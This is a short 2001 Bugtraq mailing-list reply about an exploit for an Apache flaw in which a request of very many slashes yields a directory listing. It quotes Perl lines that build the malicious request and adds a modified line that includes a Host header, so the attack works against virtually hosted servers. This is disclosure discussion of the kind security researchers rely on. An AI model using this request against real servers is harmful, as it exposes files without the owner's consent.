Re: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit

[Stephen Cope <mail-d-20010615 () kimihia org nz>]

In my testing you need to take the Host header into account.

:   $url = "GET ";
:   $buffer = "/" x $low . " HTTP/1.0\r\n";
:   $end = "\r\n\r\n";

The server I tested against uses mod_rewrite to do virtual hosting, and it
arrived at a different magic number with the host header, and against
without the header.

I made the following change to the above code:

  $buffer = "/" x $low . " HTTP/1.0\r\nHost: ". $host ."\r\n";

Should be fairly easy to understand.

-- 
Stephen Cope <http://sdc.org.nz/>
Sign the petition and Stop the Pop: http://lifefm.org.nz/petition/